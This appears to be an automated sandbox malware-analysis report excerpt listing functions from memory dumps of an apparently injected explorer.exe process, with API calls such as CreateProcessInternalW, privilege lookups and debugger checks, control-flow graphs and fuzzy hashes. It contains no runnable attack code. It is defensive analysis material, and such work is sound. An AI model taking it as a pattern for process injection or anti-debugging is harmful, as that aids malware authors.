                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: cdf84c750018856d3ec9547f99c615ced0663a69555afef17971b88368436077
                                                                                                                      • Instruction ID: 290bfb0cd6529c8a8ee893af1360f599b90a36c355e32073fc78c4bf115d2de2
                                                                                                                      • Opcode Fuzzy Hash: cdf84c750018856d3ec9547f99c615ced0663a69555afef17971b88368436077
                                                                                                                      • Instruction Fuzzy Hash: 3901F771A812287BE721E6D08C02FFE776DAB41B55F040119FF04FA1C1E6A42A064BF5
                                                                                                                      Function 02958310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 606 2958310-295832d call 296be20 609 2958333-295833d 606->609 610 295832e call 296c9c0 606->610 611 2958343-295835a call 2964e40 609->611 612 295833e call 295ace0 609->612 610->609 616 295835c-295836e PostThreadMessageW 611->616 617 295838e-2958392 611->617 612->611 618 2958370-295838b call 295a470 PostThreadMessageW 616->618 619 295838d 616->619 618->619 619->617
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: e2c2d1279036287ff070805d3bcb2bf8543f74bc46c2f0033316a114a3a577a2
                                                                                                                      • Instruction ID: e5ef4d5f00599e39fb63b62fab922325245bbd2fedb233a277f727459087b06b
                                                                                                                      • Opcode Fuzzy Hash: e2c2d1279036287ff070805d3bcb2bf8543f74bc46c2f0033316a114a3a577a2
                                                                                                                      • Instruction Fuzzy Hash: CE01D671B8122877E721EAD49C06FFF776D6B80B51F040119FF04BA1C1E6A469064BF6
                                                                                                                      Function 02958393 Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 622 2958393-2958394 call 296c9c0 626 2958343-295835a call 2964e40 622->626 627 295833e call 295ace0 622->627 631 295835c-295836e PostThreadMessageW 626->631 632 295838e-2958392 626->632 627->626 633 2958370-295838b call 295a470 PostThreadMessageW 631->633 634 295838d 631->634 633->634 634->632
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 21b561e7148d800360665b29aa3ded65db0ad955a97258f5bc03fc797e462292
                                                                                                                      • Instruction ID: 072c4dd3d724bfecc9d381e1e1ab41247e401d12d0235f4631ff55148bb87442
                                                                                                                      • Opcode Fuzzy Hash: 21b561e7148d800360665b29aa3ded65db0ad955a97258f5bc03fc797e462292
                                                                                                                      • Instruction Fuzzy Hash: A0F02231B8123877E721AA948C02FBE27596B81B50F080659FE44BA1C0D6A569074BE5
                                                                                                                      Function 0296A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0296A6F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                      • Instruction ID: 1586fa81080315e908686cd89f400b7fdc718ed43a391f585199ea5490cdfc4f
                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                      • Instruction Fuzzy Hash: A201AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4
                                                                                                                      Function 02969170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0295F040,?,?,00000000), ref: 029691AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                      • Instruction ID: 0cead655a3edccc4eaa7fcee1062d77fcafcf8983c7962fc9fa9bc556d7da9ff
                                                                                                                      • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                      • Instruction Fuzzy Hash: 3DE06D333902043AE2306599AC02FA7B39D8B91B60F150026FA0DEB6C0D595F40146A4
                                                                                                                      Function 0296A781 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0295F1C2,0295F1C2,?,00000000,?,?), ref: 0296A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                      • Instruction ID: 4d99c486b009668040620aae2b01288ee77623bbf27b511c8253a6d9bffc402d
                                                                                                                      • Opcode Fuzzy Hash: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                      • Instruction Fuzzy Hash: A6F0EDB2200204ABDB24DF54DC85EE733A9EF89314F1080A9F90D6B241CA35A805CBB0
                                                                                                                      Function 0296A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0295F1C2,0295F1C2,?,00000000,?,?), ref: 0296A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                      • Instruction ID: 8b2e9aff7b51e615537f47cdf36dceabca11d4af3788c01cef7ff03305291023
                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                      • Instruction Fuzzy Hash: 57E01AB22002086BDB10DF89DC84EE737ADAF88650F018164BA0867241C930E8108BF5
                                                                                                                      Function 0296A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02964526,?,02964C9F,02964C9F,?,02964526,?,?,?,?,?,00000000,00000000,?), ref: 0296A61D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                      • Instruction ID: af88ccdeab70f99ef9814725a107db868c53baaafab7f6527cef462555a4822a
                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                      • Instruction Fuzzy Hash: CCE012B2200208ABDB14EF99DC44EA777ADAF88654F118558BA086B241C630F9108AB0
                                                                                                                      Function 0295F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,02958D14,?), ref: 0295F6EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                      • Instruction ID: dc76602003dc737bfd4e4c5a7b8f7fad26971a4ee3712020fc89e85bf01dc258
                                                                                                                      • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                      • Instruction Fuzzy Hash: 31D05E627503082BE610FAE49C06F2732CD5B55B14F490064FA48973C3D954E0004565
                                                                                                                      Function 04C22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
                                                                                                                      • Instruction ID: 66daf1e35294b94972a1a512fdbae4fc8832d0a98553db55555fa20084c0122b
                                                                                                                      • Opcode Fuzzy Hash: ec8835e5682e650ebaed85fd17f19ab6cd9b3c050ab8dd93b2ddb1afe4b0d861
                                                                                                                      • Instruction Fuzzy Hash: 64B09B719015D5C5FB11F764470871779516BD0705F15C071E2034641E4778D1D1F175

                                                                                                                      Non-executed Functions

                                                                                                                      Function 004A79E1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 23COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,004A7B29,003C5E78), ref: 004A79E6
                                                                                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A79FB
                                                                                                                      • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(){Jx^<,?,004A7B29,003C5E78), ref: 004A7A04
                                                                                                                      • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,004A7B29,003C5E78), ref: 004A7A20
                                                                                                                      • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,004A7B29,003C5E78), ref: 004A7A27
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4153712059.0000000000699000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4153712059.000000000069E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155839247.00000000006A8000.00000002.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000006A9000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000751000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000780000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000789000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000790000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000794000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.0000000000797000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007A4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007AB000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007AF000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007B1000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007B3000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007C0000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007C9000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007D0000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007D4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007DE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4155895537.00000000007E1000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_3c0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID: ){Jx^<
                                                                                                                      • API String ID: 2579439406-3128928623
                                                                                                                      • Opcode ID: 4c9b701f18dde9701dfc2cd8c86270c58199e8adf8c559b03be081142c3e2255
                                                                                                                      • Instruction ID: 37c35a778b2b876cccc396a1656fba3a4a408888106c2ade5ee89a8f1a55979e
                                                                                                                      • Opcode Fuzzy Hash: 4c9b701f18dde9701dfc2cd8c86270c58199e8adf8c559b03be081142c3e2255
                                                                                                                      • Instruction Fuzzy Hash: 54E09A72441204EFEB00AFA1FE0EB593B6EEB64716F00741BF609858A2DFB659408A55
                                                                                                                      Function 04C22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 2661c99d3ebab25732793ef1aa4d0e17c2163743b4ae2eae0f5399dfcf2e7288
                                                                                                                      • Instruction ID: 00aa35b0c8a93fc3ea860f49ca2ddf72a5fd9fd9925a99fd3b6be661dfae5b08
                                                                                                                      • Opcode Fuzzy Hash: 2661c99d3ebab25732793ef1aa4d0e17c2163743b4ae2eae0f5399dfcf2e7288
                                                                                                                      • Instruction Fuzzy Hash: DF510BB2B005267FDB20DF99899097EF7B9BB0820475482A9E495D7641E3B4FF40DBE0
                                                                                                                      Function 04C92410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 25ffb7627ab28c9e1f4c0192a24def0424426e72a57a31cdb9cd8bc32c0fd88e
                                                                                                                      • Instruction ID: f24b83c0e9ad4dd003b32227f27a5887402222474c093c40eb2d0400350b565c
                                                                                                                      • Opcode Fuzzy Hash: 25ffb7627ab28c9e1f4c0192a24def0424426e72a57a31cdb9cd8bc32c0fd88e
                                                                                                                      • Instruction Fuzzy Hash: 7451E371A00645BBDF20DE9DC89497EB7FAEB44204B0488A9E4D6D7642E6B4FF409B60
                                                                                                                      Function 04C17630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C546FC
                                                                                                                      • Execute=1, xrefs: 04C54713
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C54725
                                                                                                                      • ExecuteOptions, xrefs: 04C546A0
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C54742
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C54655
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C54787
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: a21c3004944b92d8137031922a057fa30d65404bf262ac26382ac52b32941c63
                                                                                                                      • Instruction ID: f11037dae911d7337b5e0a27d4ebf9f39da8a94f5912dae943b84d67388379ea
                                                                                                                      • Opcode Fuzzy Hash: a21c3004944b92d8137031922a057fa30d65404bf262ac26382ac52b32941c63
                                                                                                                      • Instruction Fuzzy Hash: F35108316012197BEF11ABA5EC85FAE77BAEF06304F0400D9E505A71A1EB70BE81EF54
                                                                                                                      Function 04C2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: 0a2f2b59104f64c76d672053356db8223a13c79e1341869636d67f9fb7aca08d
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 1581E530E052698FDF28CE68CA517FEBBB3AF45710F184519D865A7291E7B4BE40CB60
                                                                                                                      Function 04C920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 8293fec1c4a3be6f8193a853c8a4e5c50c3fee3d1ac8807da89f7c3d94f8e5db
                                                                                                                      • Instruction ID: a4b484f0aaf41d8950b20dc236cd9db4e3ce0e24e0b9bef3f81bda2bcf9e3c4a
                                                                                                                      • Opcode Fuzzy Hash: 8293fec1c4a3be6f8193a853c8a4e5c50c3fee3d1ac8807da89f7c3d94f8e5db
                                                                                                                      • Instruction Fuzzy Hash: BE21517AA00119BBDB10DFA9D844AAEBBFAEF44654F040566E945E3200E730EE119BA1
                                                                                                                      Function 04C0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C502BD
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C502E7
                                                                                                                      • RTL: Re-Waiting, xrefs: 04C5031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 29f39753fe9d90b5237922af91e952eb9de1adbbb107b8247d9e3c327a917d02
                                                                                                                      • Instruction ID: 369fbe08b9d962aa9a882e477bfc8d54dfd1fbb6cbf34ec98b2e9008657f83fb
                                                                                                                      • Opcode Fuzzy Hash: 29f39753fe9d90b5237922af91e952eb9de1adbbb107b8247d9e3c327a917d02
                                                                                                                      • Instruction Fuzzy Hash: AFE1BF306047419FD725CF29C884B2AB7E2BB88314F144A5DF995CB2E1E7B4FA85CB42
                                                                                                                      Function 04C1BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C57B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 04C57B8E
                                                                                                                      • RTL: Re-Waiting, xrefs: 04C57BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
